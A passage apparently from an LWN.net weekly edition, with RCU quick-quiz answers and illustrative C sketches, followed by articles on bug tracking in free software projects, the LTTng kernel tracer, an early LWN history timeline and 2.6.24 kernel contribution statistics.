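 * Task 1:  idx = srcu_read_lock(&ssa);
 *          synchronize_srcu(&ssb);
 *          srcu_read_unlock(&ssa, idx);
 *
 * Task 2:  idx = srcu_read_lock(&ssb);
 *          synchronize_srcu(&ssa);
 *          srcu_read_unlock(&ssb, idx);
 *
 * Returns true if, after both tasks have entered their readers, each
 * task's grace-period wait is blocked by the other task's reader.
 */
bool cross_domain_deadlock(void)
{
	struct srcu_model ssa = { 0 }, ssb = { 0 };

	model_srcu_read_lock(&ssa);	/* task 1 becomes a reader of ssa */
	model_srcu_read_lock(&ssb);	/* task 2 becomes a reader of ssb */

	bool task1_blocked = model_sync_would_block(&ssb);
	bool task2_blocked = model_sync_would_block(&ssa);

	return task1_blocked && task2_blocked;
}
```

In the model, each task holds a read-side critical section on one domain
while waiting for a grace period on the other, so neither wait can ever
complete.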


Back to Quick Quiz 6.
Quick Quiz 7:
Why doesn't list_del_rcu() poison both the next
and prev pointers?

Answer: Poisoning the next pointer would interfere
with concurrent RCU readers, who must use this pointer.
However, RCU readers are forbidden from using the prev
pointer, so it may safely be poisoned.
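
The asymmetry can be seen in a single-threaded userspace sketch.  This is
not the kernel's implementation: the sketch_* names and the poison value
are assumptions chosen for illustration, and the memory-ordering care that
real RCU list code needs is omitted.

```c
#include <stddef.h>

struct list_head {
	struct list_head *next, *prev;
};

/* Illustrative poison value (an assumption); the kernel defines its own. */
#define SKETCH_POISON ((struct list_head *)0x200)

/* Make an empty circular list. */
void sketch_list_init(struct list_head *head)
{
	head->next = head;
	head->prev = head;
}

/* Insert item right after head. */
void sketch_list_add(struct list_head *item, struct list_head *head)
{
	item->next = head->next;
	item->prev = head;
	head->next->prev = item;
	head->next = item;
}

/*
 * Unlink entry from its neighbors.  entry->next is deliberately left
 * alone, so a reader that is still standing on entry can continue
 * forward through the list.  Only entry->prev, which readers must not
 * use, is poisoned.
 */
void sketch_list_del_rcu(struct list_head *entry)
{
	entry->next->prev = entry->prev;
	entry->prev->next = entry->next;
	entry->prev = SKETCH_POISON;
}
```

After sketch_list_del_rcu() returns, new traversals starting from the head
no longer find the entry, yet the entry's own next pointer still leads back
into the list.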

Back to Quick Quiz 7.
Quick Quiz 8:
Normally, any pointer subject to rcu_dereference() must
always be updated using rcu_assign_pointer().
What is an exception to this rule?

Answer: One such exception is when a multi-element linked
data structure is initialized as a unit while inaccessible to other
CPUs, and then a single rcu_assign_pointer() is used
to plant a global pointer to this data structure.
The initialization-time pointer assignments need not use
rcu_assign_pointer(), though any such assignments that
happen after the structure is globally visible must use
rcu_assign_pointer().

However, unless this initialization code is on an impressively hot
code-path, it is probably wise to use rcu_assign_pointer()
anyway, even though it is in theory unnecessary.
It is all too easy for a "minor" change to invalidate your cherished
assumptions about the initialization happening privately.
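
A userspace analog of this pattern can be sketched with C11 atomics.
This is an illustration rather than kernel code: a release store stands
in for rcu_assign_pointer(), an acquire load stands in for
rcu_dereference(), and the node structure and function names are
hypothetical.

```c
#include <stdatomic.h>
#include <stddef.h>

struct node {
	int key;
	struct node *next;
};

static struct node n1, n2;

/* The one globally visible pointer; NULL until the list is published. */
static _Atomic(struct node *) global_list;

void publish_list(void)
{
	/*
	 * Private initialization: no other thread can reach n1 or n2
	 * yet, so plain stores are enough for the internal links.
	 */
	n2.key = 2;
	n2.next = NULL;
	n1.key = 1;
	n1.next = &n2;

	/*
	 * Single publication step.  The release store orders all of the
	 * initialization above before the pointer becomes visible.
	 */
	atomic_store_explicit(&global_list, &n1, memory_order_release);
}

int sum_keys(void)
{
	/* Reader side: pick up the published pointer, then traverse. */
	struct node *p = atomic_load_explicit(&global_list,
					      memory_order_acquire);
	int sum = 0;

	for (; p != NULL; p = p->next)
		sum += p->key;
	return sum;
}
```

The plain stores are safe here only because nothing changes the internal
links after publication; any later update to a visible pointer would need
the ordered form.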

Back to Quick Quiz 8.
Quick Quiz 9:
Are there any downsides to the fact that these traversal and update
primitives can be used with any of the RCU API family members?

Answer: It can sometimes be difficult for automated
code checkers such as "sparse" (or indeed for human beings) to
work out which type of RCU read-side critical section a given
RCU traversal primitive corresponds to.
For example, consider the following:
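
A sketch of such a case follows.  The no-op macros are userspace
stand-ins (assumptions) so that the fragment compiles outside the kernel,
and global_pointer, struct foo, and read_a() are hypothetical names.

```c
#include <stddef.h>

/* Userspace stand-ins (assumptions); in the kernel these are real primitives. */
#define rcu_read_lock()		do { } while (0)
#define rcu_read_unlock()	do { } while (0)
#define preempt_disable()	do { } while (0)
#define preempt_enable()	do { } while (0)
#define rcu_dereference(p)	(p)

struct foo {
	int a;
};

static struct foo foo_instance = { .a = 42 };
static struct foo *global_pointer = &foo_instance;	/* hypothetical */

int read_a(void)
{
	struct foo *p;
	int a;

	rcu_read_lock();	/* begins an RCU Classic read-side critical section */
	preempt_disable();	/* begins an RCU Sched read-side critical section */
	p = rcu_dereference(global_pointer);	/* protected by which of the two? */
	a = p ? p->a : -1;
	preempt_enable();
	rcu_read_unlock();
	return a;
}
```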


Is the rcu_dereference() primitive in an RCU Classic
or an RCU Sched critical section?
What would you have to do to figure this out?

Back to Quick Quiz 9.

		Development issues part 2: Bug tracking


Once upon a time, free software was a relatively rare commodity, and there
was a real novelty in being able to run a free package for a specific
purpose.  The availability of a free C compiler, for example, was cause for
celebration.  The fact that said compiler was not always the most reliable
program on the system did little to reduce enthusiasm; many of us persisted in
irrational endeavors (like trying to use gcc to build the X Window System)
despite the occasionally painful (and predictable) consequences.  And, in
the process, we helped to make both programs more reliable. 


There comes a time, though, when even the most die-hard free software
proponent wishes that things would just work.  As our software finds its
way into more situations where failures are unwelcome (at best), the level
of tolerance for bugs is falling.  The desire for fewer flaws, however,
runs counter to the desire for increasingly capable (and thus more complex)
software. 
Somehow we have to find ways to simultaneously grow our systems and reduce
the total number of bugs.  To this end, a few projects have been having
some interesting discussions on the tracking and fixing of bugs.


As has been discussed in this companion article, 
Eric Raymond has been busily stirring up trouble on the Emacs development
list.  His point, deemed reasonable by your editor, is that Emacs must
adopt a number of relatively modern development practices if it is to have
any hope of remaining relevant at all.  One of
his key points is that Emacs needs to have a real bug tracking system.
Says Eric:


	Now I consider Emacs: 1100K lines, a COCOMO estimate of over 328
	years, and no issue database. I think I understand much
	better now why the team has only been able to ship one release
	in five years.  Trying to converge on a releasable state with as
	poor a view of the Emacs bug load as we have must be damn near
	impossible.


While some of Eric's suggestions appear to be non-starters - imagine trying
to get Richard Stallman to hang out on an IRC channel - the bug tracker
suggestion might just go somewhere.  Certainly it could only be an
improvement for a project of that size to have some sort of idea of what
the current list of outstanding bugs looks like.  It might even help bring
about another Emacs release before the end of the decade.

Bug trackers are not a magical solution to the bug problem, though; in
fact, they can create some problems of their own.  The Fedora project,
which does have a bug tracker, is currently trying to figure out what to do
with the contents of that tracker.  It seems that said tracker contains 
over 13,000 bugs, almost 10,000 of which apply to Fedora 7 and later.

A bug database of this size is simply overwhelming to anybody who tries to
do something about it.  As a result, Fedora users are filing bugs, only to
see nothing happen in response.  Not even a "thanks for your report"
message.  This situation is discouraging for everybody involved, causing
Fedora users to give up on reporting bugs and developers to fear looking at
the tracker.


In the Fedora case, there appears to be a near-consensus that the biggest
problem is in triaging bug entries.  This is not a job which can be
automated; somebody has to go through bug submissions, weed out the
duplicates, identify those which are really "features," figure out which
developer should be notified, etc.  Tying bug entries to those found in
upstream trackers would be a highly useful bonus.  Without this sort of
effort, the bug tracker quickly fills with low-quality entries which help
nobody.

For the most part, nobody is doing this job for Fedora now.  Red Hat is not
paying for a staff member to triage bugs, and the wider community has not
filled this gap.  In the short term, any sort of solution looks like it
will have to come from the community, so the Fedora folks are wondering
what can be done to encourage more participation.  Simply asking for help
is the obvious first step, as is making sure that the process is easy.
Then they may consider the tactics adopted by other large projects -
Mozilla's policy of expressing its appreciation by sending a T-shirt, for
example. 

As an aside, one of the more useful bits of information to come from this
discussion was the existence of this family of URLs:


Fill in the name, and the result is an immediate list of open bugs
for the given package.  Thus, for example, a visit to bugz.fedoraproject.org/gcc
yields a list of compiler bugs.  This result can be had directly from
bugzilla, of course, but this interface is faster and easier.

The Fedora developers have discussed a number of related issues, such as
whether the Fedora bug database should be separated from the RHEL system
and what can be done to make Red Hat better appreciate the value of doing
more of its quality assurance work in the Fedora repository.  But the core
problem is just getting human attention applied to the bug reports.
Digging through bug databases is a relatively unglamorous job; it is not an
easy path toward rock-star hacker status.  But it is an important and
relatively easy way to help make free software better.

Just in time to serve as an example of how well bug management can work,
the GNOME project has posted its annual
bugzilla statistics.  It seems that over 110,000 GNOME bugs were filed
in 2007, and almost 109,000 of them were closed.  The top bug-closers for the
year were:


It is worth pondering for a moment the amount of energy required to
close over 14,000 bugs in a year - that's almost 40 per day, every day,
without a break.  This kind of energy does exist within our
community, and some projects are putting it to very good use.


While it is easy to get a contrary impression, the kernel does, in fact,
have a bug tracker; there is
also, in the form of Natalie Protasevich, somebody who handles the care and
feeding of that tracker.  But, as a recent episode shows, that still is not
always sufficient to actually get the bugs fixed.


On November 13, 2007, a bug
in the SCSI subsystem was reported to the linux-kernel mailing list.
It was put into the tracker as bug 9370 on the
same day.  Some developers looked at it over the next few days, but, even
though a specific commit which appeared to cause the bug had been
identified, no solution was forthcoming.  Discussion eventually died out.
At least until January 2, when Ingo Molnar decided to stir the pot by
posting a patch to revert the seemingly
guilty commit.  
At that point the discussion picked up and a reliable way of reproducing
the bug was found.  The commit which was said to have caused the problem
was, in fact, not guilty; it had just caused an older bug to come to
light.  The discussion did not stop there, though.


A number of charges went back and forth which do not require discussion
here.  But one core point is this: as long as the bug report sat in the
tracker, nothing much appeared to be happening with it - though, it seems,
the SCSI developers had not forgotten it and were trying to figure out what
was really going on.  But once the problem came back to the linux-kernel
list in the form of a brute-force solution, the root cause was found in
short order.  The key here was bringing the problem to the attention of a
wider group of people; the crucial recipe for
reproducing the problem came from a developer who had not been looking
at the problem previously.


In the kernel context, at least, giving wide exposure to a bug often helps
immensely in getting that bug fixed.  That is especially true for the sort
of hard-to-reproduce bugs which tend to come up in kernel programming.  So,
while bug trackers are a useful tool for ensuring that problems do not fall
through the cracks, it seems that one of the most potent anti-bug tools we
have - discussing the problem via a widely-distributed email list - is the
same tool we have been using for decades.

		The Linux trace toolkit's next generation


 Instrumenting a running kernel for debugging or profiling is on the
wish list of many administrators and developers.  Advocates of OpenSolaris
like to point to DTrace as a
feature that Linux lacks, though SystemTap has started to close
that gap.  The Linux Trace Toolkit next
generation (LTTng) takes a different approach and was recently
submitted for inclusion in the kernel (in two patches: arch independent and arch dependent).  

LTTng relies upon kernel
markers to provide static probe points for its kernel tracing
activities.  It also provides the ability to trace userspace programs and
combine that data with kernel tracing data to give a detailed view of
the internals of the system.  Unlike other tools, LTTng takes a
post-processing approach, storing the data away as efficiently as possible
for later analysis.  This is in contrast to SystemTap and DTrace, which have their own
mini-languages that specify what to do as each trace point is reached.


One of the major design goals of LTTng is to have as little impact on the
system as possible, not only when it is actually tracing events, but also
when it is disabled.  Kernel hackers are quite resistant to debugging
solutions that add any significant performance penalty when not in use.  In addition, any
significant delays while enabled may change the system timing such that the bug or
condition being studied does not occur.  For this reason, LTTng does not
take the path that various dynamic tracing solutions have used and avoids
the expense of a breakpoint interrupt by using the static markers.
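
The general idea of a static probe point that costs almost nothing when
disabled can be sketched in userspace C.  This is not the kernel markers
interface, which is not shown in this article; the sketch_marker
structure, the SKETCH_TRACE() macro, and the probe function are all
hypothetical names chosen for illustration.

```c
#include <stdbool.h>
#include <stddef.h>

typedef void (*probe_fn)(const char *name, long arg);

/* One statically placed probe point (hypothetical structure). */
struct sketch_marker {
	const char *name;
	bool enabled;
	probe_fn probe;
};

/*
 * The probe site itself.  When the marker is disabled, the cost is a
 * single flag test and a not-taken branch; no breakpoint or trap is
 * involved.
 */
#define SKETCH_TRACE(m, arg)					\
	do {							\
		if ((m)->enabled && (m)->probe != NULL)		\
			(m)->probe((m)->name, (arg));		\
	} while (0)

/* Number of times the example probe has fired. */
long probe_hits;

void counting_probe(const char *name, long arg)
{
	(void)name;
	(void)arg;
	probe_hits++;
}

/* Some instrumented code: sums 0..n-1, with a probe point in the loop. */
long instrumented_work(struct sketch_marker *m, long n)
{
	long total = 0;

	for (long i = 0; i < n; i++) {
		total += i;
		SKETCH_TRACE(m, i);
	}
	return total;
}
```

Because the probe site lives in the source next to the code it observes,
it moves with that code whenever the code changes.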


Another major design goal is to provide monotonically increasing timestamp
values for events.  The original LTT uses timestamps derived from the
kernel Network Time Protocol (NTP) time, which can fluctuate somewhat as
adjustments are made – sometimes going backward.  LTTng uses a
timestamp derived from the hardware clocks that will work on various
processor architectures and clock speeds.  In addition, the timestamps can
be correlated between different processors in a multi-processor system. 
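
The same distinction is visible from userspace through the POSIX
clock_gettime() interface.  The sketch below is not how LTTng obtains its
timestamps, since it reads hardware clocks inside the kernel; it merely
illustrates, assuming a POSIX system, the difference between a clock that
may be adjusted and one that never runs backward.  The helper names are
hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <time.h>

/* Read the given clock in nanoseconds; returns 0 if the clock is unavailable. */
uint64_t clock_ns(clockid_t id)
{
	struct timespec ts;

	if (clock_gettime(id, &ts) != 0)
		return 0;
	return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

/* Wall-clock time: subject to adjustment, so it can step backward. */
uint64_t wall_ns(void)
{
	return clock_ns(CLOCK_REALTIME);
}

/* Monotonic time: never decreases, so event ordering is preserved. */
uint64_t monotonic_ns(void)
{
	return clock_ns(CLOCK_MONOTONIC);
}
```

Two successive calls to monotonic_ns() can safely be subtracted to get an
interval, while the same subtraction on wall_ns() values could come out
negative if the clock was stepped in between.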

 As LTTng gathers its data, it uses relayfs to get the data to a
userspace daemon (lttd) that writes the data to disk.  The daemon
is started from the lttctl command-line tool, which controls the
tracing settings in the kernel via a netlink socket.  A user wishing to
investigate tracing could use lttctl to start and stop a trace;
once the trace is complete, the data could be viewed and analyzed.

The LTT viewer (LTTV) is the program that is used to analyze the data
gathered.  It provides both GUI and text-based viewers to interpret the
binary data generated by LTTng and present it to the user.  Multi-gigabyte
files of tracing data are not uncommon when using LTTng, so a tool like
LTTV is indispensable for visualization and filtering to allow the user to
focus on the events of interest.  LTTV has a plugin mechanism that allows
users to develop their own display and analysis tools, while using the LTTV
framework and filtering capabilities.


An advantage of using static probe points – though some may see it as
a disadvantage – is that they can be maintained with the kernel code
they are targeting.  If the kernel markers patch is merged, subsystems can
add probe points at places they find interesting or useful and those
markers will be carried along in the kernel source, updated as the
kernel changes.  Other solutions rely on matching an external list of
probes with the version of the running kernel, which can result in
mismatches and incorrect traces.  Also, SystemTap will be able to use any
markers that get added to the kernel as is, so users who want the abilities
that it provides will also benefit.


LTTng is being developed at the École Polytechnique de
Montréal with support from quite a few Linux companies.  It
has the looks of a very well thought out framework that builds upon the
tracing work that has been done before.  It certainly won't make it into
2.6.24, but it would seem to have a good chance of making it into a future
mainline kernel.


		LWN.net: a ten-year timeline (part 1)


LWN is about to celebrate a birthday.  Picking the true anniversary of an
enterprise like LWN can be a bit tricky - there are many points which could
be said to mark the true birth of the organization.  After some thought, we
have decreed that LWN.net was born on January 30, 1998.  So we have a
tenth anniversary coming up.  That's a long time - far longer than any of
us thought we would be doing this.  Life is funny that way, somehow.


One cannot let a date like this go by without at least partially taking
advantage of its hype-creation possibilities.  So there will be a few
things happening to celebrate our decade of writing about Linux,
culminating with some sort of celebration on the 30th, when your editor
will be speaking at this year's (sold-out!) linux.conf.au in Melbourne,
Australia.  One of those will be a short series of articles - starting with
this one - looking back at those ten years.  What a long, strange trip it
has been.


Back in early 1997, your editor was the manager of a software development,
system administration, and data delivery group at the National Center for
Atmospheric Research.  He had, at that point, been using Linux for a few
years.  It was running on a number of servers, of course, but we had also
deployed it on desktops and used it for the acquisition and display of
meteorological data, including high-bandwidth (for the time) doppler radar
data.  Don't let anybody tell you that real-time Linux is a new thing.


At this time, your editor was seeing two futures: (1) an increasingly
dilbertesque life spent mostly in meetings, and (2) the clearly
bright future of Linux.  So he was actively looking for ways to move out of
conference rooms and toward Linux, and talking over schemes with a number
of friends.  An early idea - to commercialize, with LWN editor Forrest
Cook, one of the first weather stations ever put on the World Wide Web -
never quite took off.  But that thought process
continued. 

During that same time, Elizabeth Coolbaugh had just left a very similar
position at the same institution; she was looking for a new project for the
next phase of her life.  After some discussions, Liz and your editor
settled on a business idea which seemed to have some promise.  It was not
to be the last silly decision they were to make.


You see, at that time there was a struggling Linux distributor named Red
Hat which was beginning to get the sense that there might be a market for
its boxed Linux product in the corporate world.  But companies need
support, and Red Hat lacked the ability to provide that support.  So the
company's management came up with the "support partner" concept.  Upon
being accepted into this program, partner companies would be able to sell
Red Hat-backed support certificates, which Red Hat would help to market.
This widespread network of Linux experts would be able to provide local
support to clients and would, for the hardest problems, be able to get help
from Red Hat itself.  It looked like a winner for everybody involved.


That program was not yet operational at this time, though Red Hat
promised it would be Real Soon Now.  Your soon-to-be editors, not yet
having done much business with Red Hat beyond ordering an occasional CD,
believed this promise.  But it still made sense to do something productive while
waiting.  The idea that emerged after some talk was to put up a regular
newsletter about what was happening in the fast-evolving Linux community.
Even back then, keeping up with everything was hard, so we figured that the
service would be valuable.  As an added bonus, it would attract attention
to this new support company (called Eklektix) and show just how blindingly
smart and up on Linux we were.


Discussion of details occurred slowly through much of 1997.  On
January 22, 1998, the first
issue of LWN was posted; it talked about the 2.1.79 kernel, the brand-new
spinlock mechanism, the devfs debate, the creation of Red Hat Advanced
Development Labs, and attempts to bring Java to Linux.  The January 29, 1998 issue changed
the format and led off
with Netscape's announcement that it would be releasing the source code for
its browser.  We also found all of two news articles about Linux (we posted
every one we found in those days) and talked about NFS problems, the devfs
debate, the Debian 2.0 release roadmap, and gcc 2.8 problems.


At this point, we had posted two issues, but had not actually told anybody
about them.  Unsurprisingly, traffic was low.  That changed on
January 30, when our
announcement made it out to the comp.os.linux.announce newsgroup - the
best way to get the news out at that time.  As promotional text the
announcement was rudimentary at best, but it had the desired result - we
got over 1000 page views on that first day, which seemed like a lot at the
time.  LWN was off and running.


Some highlights from the early days of LWN:


 February 12, 1998: Eric
     Raymond starts pushing "open source" instead of free software.
     Worries over whether Intel's proposed "Merced" architecture would
     support Linux.

 February 19, 1998: Richard
     Stallman fights back against Open Source.  SCO claims to be the
     largest provider of Unix-based servers.  Jesse Berst's famous "could
     you get fired for choosing Linux?" article runs.  Jaroslav Kysela
     launches the "Ultra" (later ALSA) sound driver project.

 March 12, 1998: Ralph Nader
     suggests that Dell should sell Linux-installed systems.

 March 19, 1998: Bruce Perens
     resigns from the Debian project, saying: "I'm
     sorry it had to be this way, but I feel that my mission to bring free
     software to the masses really isn't compatible with Debian any longer,
     and that I should be working with one of the more mainstream Linux
     distributions."  Sendmail, Inc. was launched.

 April 2, 1998: the Mozilla
     source release happens.  Alan Cox joins Red Hat.  The feature freeze
     for the 2.2 kernel is announced.  The Open Group announces that use of
     the X Window System will require fees - but Linux users had XFree86
     and didn't care.


It's fair to say that we didn't entirely grasp the significance of the
events reported in the April 2 edition.  The hiring of Alan Cox was
one of the first in a long series - before then, almost nobody actually had
a job which involved developing Linux.  The Open Group's attempt to
relicense X was thoroughly defeated by the existence of a free version with
an active development community - a story which would be repeated a number
of times in the coming years.


 April 30, 1998: Red Hat gets
     around to launching its support program, with Eklektix as one of the
     four they had managed to sign up.  Kernel development halts as a
     result of the birth of Linus's second child.

 May 28, 1998: LWN moves to its
     own domain at LWN.net.  The Linux Standard Base is proposed.  Your
     editor first describes himself as "grumpy" after producing LWN by
     himself (Liz was at Linux Expo).  PC Week calls Linux "a communist
     operating system in a capitalist society" and predicts its demise.
     Red Hat 5.1 is released.

 July 16, 1998: KDE 1.0 is
     released; KDE v. GNOME flamewars spread across numerous mailing lists
     and web sites.

 July 23, 1998: Oracle ports
     some of its products to Linux.  
     Linus decrees
     that 8MB of memory will be needed for the 2.2 kernel.


The Oracle announcement seems mundane now, but the existence of Oracle
products for Linux was a specific indicator that many people were looking
for.  It was an indication that Linux was a "serious" platform.  Richard
Stallman, of course, thought that Oracle's announcement was terrible news. 


 July 30, 1998: Debian 2.0 is
     released.  Rumors circulate that IBM is considering Linux.
     Linux-Mandrake is launched. 

 August 13, 1998: the Open
     Source Initiative is launched, flame wars result.  Richard Stallman
     calls for free
     documentation for free software.  The kernel goes into a "hard code
     freeze" - not the first or last time that a Linus-decreed freeze would
     prove to be less hard than anticipated.  The devfs discussion
     continues.  Red Hat states that it 
     cannot legally ship Qt or KDE.

 August 20, 1998: Red Hat
     launches Rawhide.  Bruce Perens bails out of the Linux Standard Base
     effort. 

 October 1, 1998:
     Intel and Netscape (and two venture capital firms) invest in Red Hat.
     Also notable this week was the first of the big "Linus burnout"
     episodes, making it clear that something in the kernel development
     process needed to change.


Let us now pause for a moment.  From this distance, it may be hard to
appreciate just how big the news of the Red Hat investments was.  For all
that had happened, Linux was still a somewhat obscure phenomenon, unknown
to much of the information technology world.  When Intel put money into Red
Hat, it became clear to all that both Linux and Red Hat were headed toward
success.  This was, in some real sense, the point where Linux entered the
dotcom bubble, though the real action was still a year away.


The 2.1.123 release failed to compile as a result of some merging errors;
developers got upset about the state of affairs and a long, inflammatory
discussion resulted.  Linus stormed out of the virtual room and took a
vacation.  It was a somewhat scary series of events which foreshadowed more
to come; getting the kernel development process to scale as the community
grew was a multi-year process.


During this time, LWN was also growing in both readership and size; it was taking
increasing amounts of time.  We eventually had to move the server from its
initial location (behind an ISDN line in your editor's basement) to a
proper hosting facility.  But, remember, LWN was not the main endeavor;
it was an attention attractor for the support services offered by Eklektix,
Inc.  This business plan was not going particularly well.  Those who dealt
with Red Hat in that era know that, as a company, it was a rather chaotic
place.  The marketing for the support partners never happened, and the
backup services for the support plans the partners were able to sell
themselves were, shall we say, less than the customers thought they
deserved given what they had paid.  The support partner program was not
a big success for anybody involved.


As a result, one of the first things Red Hat did with its new pile of cash
was to cancel this program and start building its own, internal support
operation.  Eklektix continued to push its own support offerings for a
while, but the fact of the matter is that it was not a fun business: it
seemed to mostly consist of cleaning up after low-budget ISPs which could
not be bothered to install security updates.  So the search for
alternatives began.  Meanwhile:


 October 16, 1998:
     Larry McVoy contacts LWN and describes his upcoming "BitKeeper"
     software as a way of making Linus "scale".  Debian takes an official position
     against KDE.

 November 5, 1998: The
     Halloween Memo.

 November 19, 1998: The Qt
     library becomes available under the new QPL, eliminating roadblocks
     for the distribution of KDE.  VA Research (also known as VA
     Linux, VA Software, and SourceForge) gets a big
     venture capital infusion.  Red Hat hires Matthew Szulik as CEO.

 The first LWN
     Linux timeline was released at the end of 1998.

 January 28, 1999: LWN's first
     anniversary.  The 2.2 kernel is released, complete with a
     trivially-exploited security hole.  Linus decrees that
     32-bit Linux will never support more than 2GB of memory.
     The TCP-wrappers
     distribution is compromised.  The Windows refund movement gathers
     steam. 

 February 11, 1999: perhaps the
     first big discussion of binary-only modules.

 February 25, 1999: IBM
     announces support for Red Hat Linux on its systems.


About this time, Eklektix announced that its new line of business would be
training - and Linux system administration training in particular.  The
announcement was timed for the first ever LinuxWorld conference; both LWN
editors spoke there, with Jon delivering a system administration tutorial
to 450 attendees.  It was the start of a new phase - though it was not much
more successful than the one which came before.


If the investments in Red Hat were the beginning of the Linux bubble,
LinuxWorld was where the inflation began in earnest.  The amount of money
on display there was impressive to say the least.  The Red Hat party will
live forevermore in the memory (or lack of memory, as the case may be) of
all who attended.  LinuxCare, which was supposed to be the big
support success story for Linux, was unveiled at this conference.  Never
had there been so much overt commercial interest around Linux.


 March 25, 1999: It turns out
     that BitKeeper is to come out under a not-really-open-source license.


 April 8, 1999: Discouraged
     Mozilla developers resign from the project - there was a time when it
     seemed like a usable Mozilla browser would never come.  Dell buys a
     piece of Red Hat.  Al Gore claims to have an open source presidential
     campaign.  RMS battles for "GNU/Linux" on linux-kernel.

 April 15, 1999: the Mindcraft
     study.  It turned out that some of Mindcraft's criticisms were right,
     but we fixed the problems in a hurry.

 April 27, 1999: The last Linux
     Expo is held in Raleigh.  


It is interesting to note that, during this time, LWN got its first
acquisition offer: from Red Hat.  We turned it down: the terms of the offer
looked much like indentured servitude under firm Red Hat control.  But we
did work a deal with the company to supply news items for its portal site.
Yes, during this time, Red Hat's business model was aiming toward becoming
the dominant network portal for Linux-related information.  Remember, this
was 1999.


 June 10, 1999: Red Hat files 
     for its IPO.  VA Linux bulks up on free software developers.

 July 1, 1999: Slashdot is
     acquired by Andover.net.  Eric Raymond and Richard Stallman feud over
     "open source." 

 July 22, 1999: Red Hat gives
     Linux hackers an opportunity to buy pre-IPO stock.

 August 12, 1999: Red Hat goes
     public, with great success.  Andover acquires Freshmeat.net.  The
     second LinuxWorld conference is held.


The Red Hat IPO was the beginning of a new phase: clearly somebody was
making a lot of money from Linux, even if who wasn't exactly clear.  What
was clear is that Eklektix was not on the list.  When we planned out the
training offering, we had a set of spreadsheets with some truly wonderful
numbers on the income which was sure to result.  Somehow reality failed to
match the spreadsheets.  So we came to realize that we needed to look in
other directions.


At this time, advertising was beginning to bring in some actual money.
But, more to the point, as the market heated up, companies were showing
increasing amounts of interest in anybody who had any sort of Linux
credibility or mindshare.  We had some of that credibility at that time.
So we decided to see what would happen if we let the word out that LWN was
for sale.  Suffice to say that the result was a far wilder ride than we
could have ever anticipated.  But that will be the topic of next week's
installment.

		2.6.24 - some statistics


As of this writing, the 2.6.24 kernel is getting close to a release -
though there is likely to be one more -rc version to look at first.  The
rate of change has slowed significantly, though, and the final regressions
are being chased down.  So it seems like a suitable time to look at the
patches which went into this kernel and where they came from.

This is, in many ways, a record-breaking development cycle.  Over 10,000
individual changesets have been merged this time around, with a net growth
of almost 300,000 lines of code.  950 developers contributed this code; of
those, 358 contributed just one patch.  By comparison, the previous cycle
(2.6.23) merged some 6200 patches from about 860 developers.  Given that,
it's not surprising that the 2.6.24 cycle has been a little longer than
some of its predecessors.


Without further ado, here is the list of top contributors to this kernel:


By either method of counting, Thomas Gleixner comes out at the top of the
list by virtue of his work on the i386/x86_64 architecture merger.
Bringing those architectures together and making the result work well was a
huge job; this effort will continue into future development cycles.  (For
the curious, simply renamed files were not counted as "changed lines" in
the generation of these numbers).  Note that many of these patches also
carry a signoff by Ingo Molnar, but git only stores the name of a single
"author" for a changeset.


Other contributors of large numbers of changesets in 2.6.24 include
Bartlomiej Zolnierkiewicz (lots of IDE driver patches), Adrian Bunk
(cleanups all over the kernel tree), Ralf Baechle (MIPS architecture work),
Pavel Emelyanov (mostly network and PID namespaces), Tejun Heo (serial ATA
and a number of sysfs cleanups), Johannes Berg (wireless networking), and
Al Viro (mostly annotation patches and related fixes).  If one looks at the
number of changed lines, the list of developers changes almost completely:
Zhu Yi (iwlwifi driver), Auke Kok (e1000 driver), Michael Buesch (wireless
networking and the b43 driver), Ivo van Doorn (rt2x00 wireless driver),
Matthew Wilcox (SCSI, especially advansys and sym53c8xx drivers), Adrian
Bunk (cleanups and code deletions), Larry Finger (mainly addition of the
b43 legacy driver), and David Miller (networking and SPARC64).


If one assigns developers' contributions to employers and totals the
results, the following numbers emerge (note that these tables have been
updated since initial publication to fix an error):


In many ways, these lists look similar to those posted for past kernels.
But there are a few things which jump out this time around:


 Intel has made it to the top of the "by lines changed" list - and 
     not just by a little bit.  This happened by virtue of the work done by
     four of the top-20 developers, but also by dozens of others who
     contributed to the 2.6.24 kernel.  Intel has a lot of people
     working on the kernel, many of whom spend little time in the
     limelight.

 Movial found its way onto the list
     for the first time as a result of having hired a very active
     developer.

 The amount of work done by people known to be hacking on their own
     time has grown a bit.  This change is mostly a result of more complete
     information on our side - many developers have moved out of the
     "unknown" category.  Quite a bit of the no-employer work this time
     around was done on the wireless networking tree; since much of the
     interesting work in this area currently involves reverse engineering,
     perhaps it is not surprising that relatively few companies are willing
     to sponsor it.


All told, some 130 distinct employers were identified for the contributors
to 2.6.24.  That is a lot of companies to be working on one body of code.


Looking at the Signed-off-by headers of patches is always interesting; if
one removes the signoffs added by the authors themselves, what is left is a
list of the gatekeepers - those who channel the code into the mainline.
The people who signed off on the most patches which they did not write are:


There are not a lot of changes here from previous development cycles.
While quite a few developers add signoffs to code and pass it on, they work
for a relatively small number of companies - 7 employers account for
70% of the non-author signoffs.
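
The counting rule described above (drop each author's own signoff, tally what remains) can be sketched in a few lines of Python.  This is only an illustration of the idea, not the tooling used to produce the numbers in this article; the function name, the input format (a list of author/message pairs), and the sample names are all hypothetical.

```python
import re
from collections import Counter

# Matches "Signed-off-by: Some Name <address>" on a line of its own.
SIGNOFF = re.compile(r"^[ \t]*Signed-off-by:[ \t]*(.+?)[ \t]*<[^>]*>[ \t]*$",
                     re.MULTILINE | re.IGNORECASE)

def non_author_signoffs(commits):
    """Count signoffs per person, skipping each commit's own author.

    commits is an iterable of (author_name, commit_message) pairs.
    """
    counts = Counter()
    for author, message in commits:
        for name in SIGNOFF.findall(message):
            if name.strip().lower() != author.strip().lower():
                counts[name.strip()] += 1
    return counts

# Hypothetical sample data, for illustration only.
sample = [
    ("Alice Dev", "fix a bug\n\n"
                  "Signed-off-by: Alice Dev <alice@example.org>\n"
                  "Signed-off-by: Maint One <maint@example.org>\n"),
    ("Bob Dev", "add a driver\n\n"
                "Signed-off-by: Bob Dev <bob@example.org>\n"
                "Signed-off-by: Maint One <maint@example.org>\n"
                "Signed-off-by: Top Tree <top@example.org>\n"),
]
gatekeepers = non_author_signoffs(sample)
```

Matching on names alone is a simplification; a developer who signs off under two spellings of a name would be counted twice.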


Finally, given that we are starting a new year, it is worth taking a quick
look back at the entirety of 2007.  In 2007, Linus merged just over 30,000
changesets (more than 80 per day, every day) from 1900 developers working
for (at least) 200 companies.  All
told, they changed over 2 million lines of code, growing the kernel by
